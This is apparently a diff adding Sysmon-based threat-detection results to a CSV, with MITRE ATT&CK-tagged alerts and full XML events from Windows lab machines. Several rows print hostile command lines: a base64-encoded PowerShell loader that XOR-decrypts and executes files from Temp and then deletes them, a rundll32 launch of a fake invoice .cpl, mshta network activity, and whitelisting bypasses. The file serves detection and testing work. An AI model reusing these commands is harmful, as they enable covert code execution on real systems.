+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558969968.76308,2019-05-27T19:12:48.763080+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c vssadmin List Shadows| find &quot;Shadow Copy Volume&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:48.655114Z"">
+    </TimeCreated>
+    <EventRecordID>6184</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:48.644</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE70-5CEB-0000-0010385C0C00</Data>
+    <Data Name=""ProcessId"">2412</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /c vssadmin List Shadows| find &quot;Shadow Copy Volume&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
+    <Data Name=""ParentProcessId"">1944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1564436001.567754,2019-07-30T01:33:21.567754+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname (  ) , IP ( 93.184.220.29 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:20.711201Z"">
+    </TimeCreated>
+    <EventRecordID>4908</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Suspicious NetCon</Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:19.687</Data>
+    <Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-00107F248700</Data>
+    <Data Name=""ProcessId"">3164</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
+    <Data Name=""SourcePort"">49827</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">93.184.220.29</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">80</Data>
+    <Data Name=""DestinationPortName"">http</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:11:17.587732Z"">
+    </TimeCreated>
+    <EventRecordID>4863</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:11:17.445</Data>
+    <Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
+    <Data Name=""ProcessId"">4356</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
+    <Data Name=""LogonId"">0x4131b5</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010A7B65500</Data>
+    <Data Name=""ParentProcessId"">4996</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\control.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\control.exe&quot; &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1127] Trusted Developer Utilities,1558632368.94719,2019-05-23T21:26:08.947190+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( \\vboxsrv\HTools\msxsl.exe ) through command line ( msxsl.exe  c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-23T17:26:08.716859Z"">
+    </TimeCreated>
+    <EventRecordID>1017</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""2092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-23 17:26:08.686</Data>
+    <Data Name=""ProcessGuid"">365ABB72-D7B0-5CE6-0000-001077C56D00</Data>
+    <Data Name=""ProcessId"">3388</Data>
+    <Data Name=""Image"">\\vboxsrv\HTools\msxsl.exe</Data>
+    <Data Name=""FileVersion"">1.1.0.1</Data>
+    <Data Name=""Description"">msxsl</Data>
+    <Data Name=""Product"">Command Line XSLT</Data>
+    <Data Name=""Company"">Microsoft</Data>
+    <Data Name=""CommandLine"">msxsl.exe  c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat</Data>
+    <Data Name=""CurrentDirectory"">D:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
+    <Data Name=""LogonId"">0xf347</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-D2D4-5CE6-0000-001047EA6400</Data>
+    <Data Name=""ParentProcessId"">2236</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1599760127.156198,2020-09-10T21:48:47.156198+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-10T17:48:47.077612Z"">
+    </TimeCreated>
+    <EventRecordID>380456</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3312"" ThreadID=""3928"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">-</Data>
+    <Data Name=""UtcTime"">2020-09-10 17:48:39.678</Data>
+    <Data Name=""ProcessGuid"">747F3D96-66F7-5F5A-0500-00000000F600</Data>
+    <Data Name=""ProcessId"">388</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">c:\windows\system32\cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-66F8-5F5A-E703-000000000000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-66F4-5F5A-0300-00000000F600</Data>
+    <Data Name=""ParentProcessId"">300</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\smss.exe</Data>
+    <Data Name=""ParentCommandLine"">\SystemRoot\System32\smss.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;, )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:11:17.587732Z"">
+    </TimeCreated>
+    <EventRecordID>4863</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:11:17.445</Data>
+    <Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
+    <Data Name=""ProcessId"">4356</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
+    <Data Name=""LogonId"">0x4131b5</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010A7B65500</Data>
+    <Data Name=""ParentProcessId"">4996</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\control.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\control.exe&quot; &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;, )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:11:17.587732Z"">
+    </TimeCreated>
+    <EventRecordID>4863</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:11:17.445</Data>
+    <Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
+    <Data Name=""ProcessId"">4356</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
+    <Data Name=""LogonId"">0x4131b5</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010A7B65500</Data>
+    <Data Name=""ParentProcessId"">4996</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\control.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\control.exe&quot; &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557681631.183699,2019-05-12T21:20:31.183699+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T17:20:01.980574Z"">
+    </TimeCreated>
+    <EventRecordID>16511</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2012"" ThreadID=""300"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 17:20:01.964</Data>
+    <Data Name=""ProcessGuid"">365ABB72-55C1-5CD8-0000-0010970D2F00</Data>
+    <Data Name=""ProcessId"">4092</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
+    <Data Name=""LogonId"">0x135f2</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-502E-5CD8-0000-00102A330700</Data>
+    <Data Name=""ParentProcessId"">3192</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe  url.dll,OpenURL file://C:/Windows/system32/calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:32:58.167195Z"">
+    </TimeCreated>
+    <EventRecordID>16390</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:32:58.167</Data>
+    <Data Name=""ProcessGuid"">365ABB72-208A-5CD8-0000-0010119B2400</Data>
